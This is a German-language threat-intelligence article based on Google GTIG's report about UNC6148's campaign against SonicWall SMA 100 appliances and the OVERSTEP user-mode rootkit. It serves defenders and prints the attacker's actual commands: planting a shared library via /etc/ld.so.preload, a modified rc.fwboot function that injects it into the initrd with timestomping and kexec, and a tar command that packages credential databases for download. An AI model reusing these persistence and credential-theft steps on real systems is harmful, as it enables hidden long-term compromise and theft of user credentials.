Google entdeckt ausgeklügelte Cyberangriffe auf SonicWall-Geräte – Neue OVERSTEP-Backdoor im Einsatz

Die Threat Intelligence Group (GTIG) von Google hat eine gezielte und technisch anspruchsvolle Cyberkampagne aufgedeckt, die sich gegen Endgeräte der SonicWall Secure Mobile Access (SMA) 100-Serie richtet. Laut den Sicherheitsexperten nutzen die Angreifer gestohlene Zugangsdaten, um sich unbefugt Zugriff zu verschaffen. Im Zuge der Angriffe wird eine bislang unbekannte Backdoor mit dem Namen OVERSTEP installiert – ein Rootkit, das sich tief im System verankert und den Angreifern langfristige Kontrolle ermöglicht.

Die Google Threat Intelligence Group (GTIG) hat eine laufende Kampagne eines mutmaßlich finanziell motivierten Angreifers identifiziert, den wir als UNC6148 verfolgen und der vollständig gepatchte End-of-Life-Geräte der SonicWall Secure Mobile Access (SMA) 100-Serie ins Visier nimmt. GTIG geht mit hoher Sicherheit davon aus, dass UNC6148 Anmeldedaten und Einmalpasswörter (OTP-Seeds) nutzt, die bei früheren Angriffen gestohlen wurden, um sich auch nach der Installation von Sicherheitsupdates durch die Unternehmen wieder Zugriff zu verschaffen. Die Hinweise auf den ursprünglichen Infektionsvektor waren begrenzt, da die Malware des Angreifers so konzipiert ist, dass sie Log-Einträge selektiv löscht und damit forensische Untersuchungen erschwert. Es ist jedoch wahrscheinlich, dass bekannte Schwachstellen ausgenutzt wurden.

In dieser neuen Aktivitätswelle hat der Angreifer eine bisher unbekannte persistente Backdoor/User-Mode-Rootkit eingesetzt, die GTIG als OVERSTEP verfolgt. Basierend auf den Erkenntnissen aus Mandiant Incident Response-Einsätzen zeigt unsere Analyse, dass diese Malware den Boot-Prozess des Geräts modifiziert, um persistenten Zugriff zu erhalten, sensible Anmeldedaten zu stehlen und ihre eigenen Komponenten zu verbergen. GTIG geht mit mittlerer Sicherheit davon aus, dass UNC6148 eine unbekannte Zero-Day-Sicherheitslücke für die Remote-Ausführung von Code genutzt hat, um OVERSTEP auf opportunistisch ausgewählten SonicWall SMA-Geräten einzuschleusen.

GTIG geht mit mittlerer Sicherheit davon aus, dass die Aktivitäten von UNC6148, die mindestens bis Oktober 2024 zurückreichen, darauf abzielen, Datendiebstahl und Erpressung sowie möglicherweise den Einsatz von Ransomware zu ermöglichen. Eine Organisation, die im Mai 2025 von UNC6148 angegriffen wurde, wurde im Juni 2025 auf der Datenleck-Website „World Leaks“ (DLS) veröffentlicht, und die Aktivitäten von UNC6148 überschneiden sich mit öffentlich gemeldeten SonicWall-Exploits aus dem späten Jahr 2023 und dem frühen Jahr 2024, die öffentlich mit der Bereitstellung von Ransomware der Marke Abyss in Verbindung gebracht wurden (von GTIG als VSOCIETY verfolgt).

Angesichts des Risikos einer erneuten Kompromittierung durch zuvor gestohlene Anmeldedaten sollten Unternehmen die Empfehlungen in diesem Beitrag befolgen, um potenzielle Kompromittierungen aufzuspüren und alle Anmeldedaten zu ändern, auch wenn ihre Geräte vollständig gepatcht sind. Dieser Blogbeitrag enthält technische Details zum OVERSTEP-Rootkit und zur UNC6148-Kampagne, um Verteidigern bei der Abwehr dieser Bedrohung zu helfen.

Erste SMA-Ausnutzung zum Erlangen von Administrator-Anmeldedaten

Die ersten Beobachtungen von Mandiant zu UNC6148 im Rahmen einer kürzlich durchgeführten Untersuchung ergaben, dass die Angreifer bereits über lokale Administrator-Anmeldedaten für die SMA 100-Serie-Appliance verfügten. Es wurden weder forensische Beweise noch andere Daten gefunden, die Aufschluss darüber geben könnten, wie diese Anmeldedaten erlangt wurden. GTIG geht mit hoher Sicherheit davon aus, dass UNC6148 eine bekannte Schwachstelle ausgenutzt hat, um Administrator-Anmeldedaten zu stehlen, bevor die angegriffene SMA-Appliance auf die neueste Firmware-Version (10.2.1.15-81sv) aktualisiert wurde. Dies basiert auf dem Zeitplan für die Bereitstellung von Patches und öffentlichen Berichten von SonicWall über Exploits während des gesamten Jahres 2025. Die Analyse der Metadatenaufzeichnungen des Netzwerkverkehrs deutet darauf hin, dass UNC6148 diese Anmeldedaten möglicherweise bereits im Januar 2025 aus der SMA-Appliance exfiltriert hat.

Öffentliche Berichte von SonicWall und mehreren Sicherheitsfirmen haben mehrere verschiedene Schwachstellen aufgezeigt, die möglicherweise von UNC6148 ausgenutzt wurden:

• CVE-2021-20038: Nicht authentifizierte Remote-Codeausführung (SonicWall-Hinweis, Truesec-Bericht, AttackerKB-Eintrag)
  • Hierbei handelt es sich um eine Speicherbeschädigungsschwachstelle, die zur Ausführung von Code ausgenutzt werden kann. Der öffentliche Exploit von Rapid7 kann jedoch bis zu 200.000 HTTP-Anfragen generieren und seine Ausführung kann über eine Stunde dauern, was darauf hindeutet, dass eine groß angelegte Kampagne diese Schwachstelle wahrscheinlich nicht ausnutzen wird.
  • Truesec identifizierte dies als einen plausiblen Einstiegspunkt für Intrusion-Aktivitäten, die sie Ende 2023 beobachteten und die auf eine SonicWall SMA abzielten.
• CVE-2024-38475: Unauthentifizierte Path-Traversal-Sicherheitslücke im Apache HTTP Server, von der die SMA 100-Serie betroffen war (SonicWall-Hinweis, Orange CyberDefense/SCRT-Blogbeitrag)
  • Dies kann speziell bei der SMA 100-Serie ausgenutzt werden, um zwei verschiedene SQLite-Datenbanken, temp.db und persist.db, zu exfiltrieren, in denen sensible Informationen wie Benutzerkontenanmeldedaten, Sitzungstoken und OTP-Startwerte gespeichert sind.
  • watchTowr veröffentlichte im Mai 2025 einen Blogbeitrag, in dem beschrieben wird, wie diese Sicherheitslücke mit einem anderen Fehler, CVE-2023-44221, verknüpft werden kann, um ein Gerät der SMA 100-Serie zu kompromittieren. Wir haben jedoch keine Hinweise darauf gefunden, dass diese Fehlerkette von UNC6148 genutzt wurde.
• CVE-2021-20035: Schwachstelle bei der Ausführung von authentifiziertem Remote-Code (SonicWall Sicherheitshinweis, ArcticWolf-Bericht)
  • Hierbei handelt es sich um eine Schwachstelle bei der Befehlsinjektion im Handler für /cgi-bin/sitecustomization POST-Anfragen.
  • Arctic Wolf und SonicWall berichteten im April 2025 über die Ausnutzung dieser Schwachstelle in der Praxis.
• CVE-2021-20039: Sicherheitslücke bei der authentifizierten Remote-Codeausführung (SonicWall-Hinweis, dfir.ch-Blogbeitrag, AttackerKB-Eintrag)
  • Hierbei handelt es sich um eine Sicherheitslücke bei der Befehlsinjektion im Request-Handler für /cgi-bin/viewcert.
  • dfir.ch meldete, dass diese Sicherheitslücke genutzt wurde, um SonicWall SMAs bei einem Angriff auszunutzen, der im März 2024 zur Bereitstellung von Ransomware der Marke Abyss führte, wobei ähnliche Angriffsartefakte wie bei der Untersuchung von Mandiant festgestellt wurden.
• CVE-2025-32819: Schwachstelle beim Löschen authentifizierter Dateien (SonicWall-Hinweis, Rapid7-Bericht)
  • Mithilfe einer speziell gestalteten HTTP-Anfrage kann diese Schwachstelle ausgenutzt werden, um eine bestimmte SonicWall SMA dazu zu bringen, die integrierten Administratoranmeldeinformationen auf „Passwort“zurückzusetzen, wodurch der Angreifer Administratorzugriff erhält.

Es gibt mehrere verschiedene Wege, die UNC6148 mit den oben genannten Schwachstellen oder möglicherweise einer anderen, hier nicht genannten Schwachstelle hätte einschlagen können. CVE-2024-38475 hätte lokale Administratoranmeldedaten und gültige Sitzungstoken bereitgestellt, die UNC6148 wiederverwenden könnte, was es zu einem attraktiven Ziel gemacht hätte, aber Mandiant konnte den Missbrauch dieser Schwachstelle nicht bestätigen. Die Ausnutzung der zuvor genannten authentifizierten Fehler würde voraussetzen, dass UNC6148 bereits über gewisse Anmeldeinformationen für die SMA-Appliance verfügt, was einen Missbrauch weniger wahrscheinlich macht. Dennoch sind diese Fehler aufgrund ihres Status als in freier Wildbahn ausgenutzte Schwachstellen erwähnenswert. Es ist auch möglich, dass Anmeldeinformationen über Infostealer-Protokolle oder Marktplätze für Anmeldeinformationen erlangt wurden, aber GTIG konnte keine direkte Offenlegung von Anmeldeinformationen im Zusammenhang mit den missbrauchten SMA-Appliance-Anmeldeinformationen feststellen.

Anschließender SMA-Kompromittierung und OVERSTEP-Bereitstellung

Die oben erwähnte Untersuchung von Mandiant ergab, dass UNC6148 im Juni 2025 eine Secure Sockets Layer Virtual Private Network (SSL VPN)-Sitzung auf dem angegriffenen SMA 100-Serie-Gerät unter Verwendung der genannten lokalen Administratoranmeldedaten von einem BitLaunch (BLNWX) VPS (193.149.180.50) eingerichtet hat.

Sobald die SSL-VPN-Sitzung hergestellt war, erzeugte der Angreifer eine Reverse-Shell auf dem SMA-Gerät des Ziels. Der Shell-Zugriff sollte auf diesen Geräten konstruktionsbedingt nicht möglich sein, und die gemeinsamen Untersuchungen von Mandiant und dem SonicWall Product Security Incident Response Team (PSIRT) konnten nicht feststellen, wie UNC6148 diese Reverse-Shell eingerichtet hat. Es ist möglich, dass die Reverse-Shell durch Ausnutzen einer unbekannten Schwachstelle durch UNC6148 eingerichtet wurde.

Über die Reverse-Shell führte UNC6148 erste Erkundungen und Dateimanipulationen mit verschiedenen integrierten Systembinärdateien wie cat, chmod, cp, date, hostname, mkdir, mount, mvund rmdurch. Mandiant beobachtete außerdem, dass der Angreifer Einstellungen in die SMA-Appliance exportierte und importierte und neue Netzwerkzugriffskontrollregeln für die von UNC6148 verwendeten IP-Adressen erstellte. Dies deutet darauf hin, dass er möglicherweise eine exportierte Einstellungsdatei offline geändert hat, um neue Regeln für seine Infrastruktur hinzuzufügen und so einen unterbrechungsfreien Betrieb sicherzustellen.

Nach dieser ersten Aktivität setzte der Angreifer die OVERSTEP-Backdoor ein. Dieser Prozess umfasste die Ausführung einer Reihe von Befehlen, um die Binärdatei aus Base64 in das persistente Verzeichnis /cf mit dem Dateinamen xxx.elf zu dekodieren, sie nach /usr/lib/libsamba-errors.so.6 zu verschieben und ihre Persistenz sicherzustellen, indem ihr Pfad zu /etc/ld.so.preload hinzugefügt wurde.

cd /cf; touch xxx.elf;
openssl enc -base64 -d [REDACTED] >>xxx.elf;
chmod 777 /usr/lib/libsamba-errors.so.6;
touch -c /usr/lib/libsamba-errors.so.6 -r 
echo /usr/lib/libsamba-errors.so.6 > /etc/ld.so.preload;
chown root:root /usr/lib/libsamba-errors.so.6;
chmod 777 /usr/lib/libsamba-errors.so.6;
touch -c /usr/lib/libsamba-errors.so.6 -r 
echo /usr/lib/libsamba-errors.so.6 > /etc/ld.so.preload;
arp Auswahl der auf dem Gerät ausgeführten Shell-Befehle des Angreifers

Als Nächstes modifizierte UNC6148 die legitime RC-Datei /etc/rc.d/rc.fwboot, um die Persistenz für OVERSTEP zu erreichen. Die Änderungen bedeuteten, dass bei jedem Neustart des Geräts die OVERSTEP-Binärdatei in das laufende Dateisystem des Geräts geladen wurde. Konkret wurde die Funktion bootCurrentFirmware im Skript rc.fwboot so geändert, dass sie folgenden Code enthielt:

• Erstellen eines temporären Verzeichnisses mit dem Namen zzz innerhalb des aktuellen Firmware-Verzeichnisses. Dieses Verzeichnis diente als Zwischenbereich zum Entpacken, Ändern und erneuten Packen des INITRD-Images. Dies war ein vorbereitender Schritt, um schädliche Inhalte einzuschleusen, ohne wichtige Systemdateien während der Laufzeit direkt zu überschreiben.
• Dekomprimieren der Datei INITRD.GZ, bei der es sich um das komprimierte initiale RAM-Disk-Image handelte. Die dekomprimierte Datei wurde „INITRD“ genannt und enthält das minimale Root-Dateisystem, das während des Bootvorgangs in den Speicher geladen wird, bevor das eigentliche Root-Dateisystem gemountet wird. Durch das Ändern dieses Images konnte der Angreifer schädliche Dateien einschleusen, die früh in der Bootsequenz vorhanden und ausführbar waren, wodurch sie schwer zu erkennen und zu entfernen waren.
• Die dekomprimierte INITRD-Datei wurde als Loop-Gerät in das neu erstellte Verzeichnis $fwLoc/zzz gemountet. Dadurch konnten die Inhalte der Datei INITRD wie bei einem normalen Dateisystem aufgerufen und geändert werden. Dies war ein wichtiger Schritt, der es dem Skript ermöglichte, den Inhalt der initialen RAM-Disk zu durchsuchen und zu ändern.
• Kopieren Sie die Datei libsamba-errors.so.6 aus /cf/ in das gemountete Verzeichnis INITRD /usr/lib/.
• Ändern Sie den Eigentümer und die Gruppe der Datei libsamba-errors.so.6 in root:root. Dadurch werden die Berechtigungen so festgelegt, dass sie legitime Systembibliotheken imitieren, die normalerweise root gehören.
• Ändern Sie die Dateiberechtigungen der kopierten schädlichen Bibliothek auf 0777 (Lesen, Schreiben und Ausführen für Eigentümer, Gruppe und andere).
• Verwendung einer Timestomping-Technik, um zu versuchen, den Änderungszeitstempel aus der legitimen Datei libsamba-errors.so in die schädliche Datei libsamba-errors.so.6 zu kopieren. Das Ziel war, die schädliche Datei so aussehen zu lassen, als wäre sie Teil der ursprünglichen Systeminstallation, um so die Erkennung und Untersuchung zu erschweren.
• Der Pfad zur schädlichen Datei /usr/lib/libsamba-errors.so.6 wurde in die Datei ld.so.preload im Verzeichnis INITRD /etc/ geschrieben. Dadurch laden dynamische ausführbare Dateien die gemeinsam genutzte Objektdatei OVERSTEP und sorgen so für Persistenz und privilegierte Ausführung in Systemprozessen.
• Temporäre Änderungen wurden bereinigt, darunter:
  • Ausführen ausstehender Festplatten-Schreibvorgänge, um sicherzustellen, dass alle Änderungen an der Datei INITRD gespeichert wurden
  • Aushängen der Datei INITRD aus dem temporären Verzeichnis
  • Neukomprimieren der geänderten Datei INITRD
  • Entfernen des temporären Verzeichnisses
• Umbenennen der neu komprimierten Datei INITRD in INITRD.GZ, entsprechend dem erwarteten Dateinamen.
• Ändern der Zeitstempel der geänderten Datei INITRD.GZ, damit sie mit denen der Kernel-Image-Datei BZIMAGE übereinstimmen. Dies war eine weitere Zeitstempel-Manipulation, um die Erkennung und Untersuchung zu erschweren.
• Laden des Kernel-Images BZIMAGE und der geänderten initialen RAM-Disk INITRD.GZ in den Speicher für die Ausführung eines neuen Kernels. Außerdem wurden Kernel-Boot-Optionen aus LINUX.OPT angehängt. Damit war das System bereit, mit der geänderten Firmware zu booten. Durch die Verwendung von kexec konnte der laufende Linux-Kernel einen anderen Linux-Kernel starten, ohne dass ein vollständiger Neustart der Hardware erforderlich war.
• Der neu geladene Kernel wurde durch einen Soft-Neustart ausgeführt.

Zusammenfassend lässt sich sagen, dass der Code den Boot-Prozess des Systems ausnutzte, um ein persistentes Rootkit einzuschleusen. Durch die Modifizierung der Datei INITRD und die Nutzung von ld.so.preload stellte der Angreifer sicher, dass sein Schadcode bei jedem Start einer dynamischen ausführbaren Datei geladen und ausgeführt wurde, wodurch er privilegierte und persistente Kontrolle über das Gerät erlangte.

function bootCurrentFirmware()
{
	echo "$FUNCNAME: begin" >> $LOGFILE
	fwLoc=/cf/firmware/current
   
	if [ ! -f $fwLoc/BZIMAGE ]; then
        	echo "Can't locate the kernel image" >> $LOGFILE;
	elif [ -f $fwLoc/INITRD ]; then
        	echo "Can't locate the filesystem image" >> $LOGFILE;
	else
    	mkdir $fwLoc/zzz
    	gzip -d $fwLoc/INITRD.GZ
    	mount -o loop $fwLoc/INITRD $fwLoc/zzz
 
    	cp /cf/libsamba-errors.so.6  
$fwLoc/zzz/usr/lib/libsamba-errors.so.6
    	chown root:root $fwLoc/zzz/usr/lib/libsamba-errors.so.6
    	chmod 777 $fwLoc/zzz/usr/lib/libsamba-errors.so.6
    	touch -c $fwLoc/zzz/usr/lib/libsamba-errors.so.6 -r 
$fwLoc/zzz/usr/lib/libsamba-errors.so
    	echo /usr/lib/libsamba-errors.so.6  > $fwLoc/zzz/etc/ld.so.preload
 
    	sync; umount $fwLoc/zzz; sync; gzip $fwLoc/INITRD; rm -rf $fwLoc/zzz
    	mv $fwLoc/INITRD.gz $fwLoc/INITRD.GZ; touch -c $fwLoc/INITRD.GZ -r 
$fwLoc/BZIMAGE
 
    	/usr/local/sbin/kexec -l $fwLoc/BZIMAGE --initrd=$fwLoc/INITRD.GZ  
--append="`cat $fwLoc/LINUX.OPT`"
    	/usr/local/sbin/kexec -e;
	fi
 
	echo "$FUNCNAME: end" >> $LOGFILE
}

Funktion in der Datei „rc.fwboot“ geändert, um die Persistenz für OVERSTEP zu gewährleisten.

Nach Abschluss der Bereitstellung von OVERSTEP löschte der Angreifer die Systemprotokolle und startete die Firewall neu, um die Ausführung von OVERSTEP auszulösen.

Analyse von OVERSTEP

OVERSTEP ist eine in C geschriebene Backdoor, die für Geräte der SonicWall SMA 100-Serie entwickelt wurde. Die beobachteten Samples wurden als 32-Bit-ELF-Shared-Object für die Intel x86-Architektur kompiliert. Dieses Shared Object ist so konzipiert, dass es über die Datei /etc/ld.so.preload in Prozesse geladen wird. Wenn es auf diese Weise vorab geladen wird, wird die schädliche Bibliothek in den Adressraum der anschließend gestarteten Prozesse gemappt. Durch dieses Vorladen kann die Malware Standardbibliotheksfunktionen kapern – insbesondere open, open64, readdir, readdir64und write– indem sie sicherstellt, dass diese Symbole aus dem schädlichen Shared Object vor den legitimen Systembibliotheken aufgelöst werden. Die Hauptfunktionen der Backdoor bestehen darin, eine Reverse-Shell einzurichten und Passwörter vom kompromittierten Host zu exfiltrieren. Darüber hinaus implementiert die Malware Usermode-Rootkit-Funktionen, indem sie ihre gehookten Dateisystemfunktionen (open, open64, readdir, readdir64) nutzt, um ihre Komponenten auf dem Host effektiv zu verstecken. Die Kommunikation mit dem Command-and-Control-Server (C2 oder C&C) erfolgt indirekt und basiert auf der Analyse von Befehlen aus Puffern, die von der bösartigen write API

Der Pfad zum bösartigen gemeinsam genutzten Objekt wurde zur Datei /etc/ld.so.preload hinzugefügt, wodurch sichergestellt wird, dass die Malware auf dem kompromittierten Gerät verbleibt. Durch die Aufnahme in die Datei /etc/ld.so.preload wird das gemeinsam genutzte Objekt der Malware jedem neuen Prozess zugeordnet, der auf dem kompromittierten System ausgeführt wird. Nach der Zuordnung wird die Malware über ihre Initialisierungsroutine ausgeführt, insbesondere über die exportierte Funktion my_init. Diese Funktion „my_init“ setzt dann das Flag „FS_IMMUTABLE_FL“ auf „/etc/ld.so.preload“, wodurch deren Änderung, Löschung, Umbenennung oder die Erstellung von Verknüpfungen zu ihr effektiv verhindert wird. Dieser Vorlademechanismus ermöglicht es der Malware, „LD_PRELOAD“ zu kapern und ihre eigenen Versionen der folgenden Standardbibliotheksfunktionen einzuschleusen: „open“, „open64“, „readdir“, „readdir64“und „write“. Die gekaperten open* und readdir* APIs werden genutzt, um ein Usermode-Rootkit zu implementieren, das die Präsenz und die Komponenten der Malware verbirgt. Die Kernfunktionalität der Backdoor ist hingegen in der gehakten write Funktion implementiert. Die Rootkit- und Backdoor-Funktionalitäten werden in den folgenden Abschnitten näher beschrieben.

Usermode-Rootkit

Die gekaperten API-Funktionen open und open64, die normalerweise einen Dateipfad und einen Zugriffsmodus angeben, werden von der Malware manipuliert. Die Implementierung dieser Funktionen durch die Malware überprüft, ob der angeforderte Dateipfad /etc/ld.so.preloadist. Bei einer Übereinstimmung wird ein Fehlercode zurückgegeben, wodurch verhindert wird, dass Prozesse auf dem kompromittierten System diese wichtige Datei öffnen können.

Die gekaperten API-Funktionen readdir und readdir64 werden verwendet, um die folgenden Artefakte aus Verzeichnislisten zu verbergen:

• /proc entries related to bash, sh, or ssh
• libsamba-errors.so.6 (the filename of the malware observed on this particular system)
• /etc/ld.so.preload

Backdoor

Der Mechanismus zur Ausführung von Befehlen der Backdoor basiert auf der gekaperten write API-Funktion. Die Standard-write API empfängt einen Puffer mit Daten, die für einen E/A-Stream bestimmt sind. In dieser Implementierung untersucht die bösartige Schreibfunktion die ersten 1024 Bytes dieses Puffers und sucht nach den Befehlszeichenfolgen dobackshell oder dopasswords. Wenn eine der beiden Zeichenfolgen gefunden wird, erwartet die Malware, dass unmittelbar danach die zugehörigen Befehlsparameter folgen.

tar czfP /usr/src/EasyAccess/www/htdocs/<filename>.tgz 
/tmp/temp.db /etc/EasyAccess/var/conf/persist.db 
/etc/EasyAccess/var/cert; chmod 777 
/usr/src/EasyAccess/www/htdocs/<filename>.tgz

Shell-Befehle, die vom Befehl dopasswords OVERSTEP ausgeführt werden

Quelle: Ongoing SonicWall Secure Mobile Access (SMA) Exploitation Campaign using the OVERSTEP Backdoor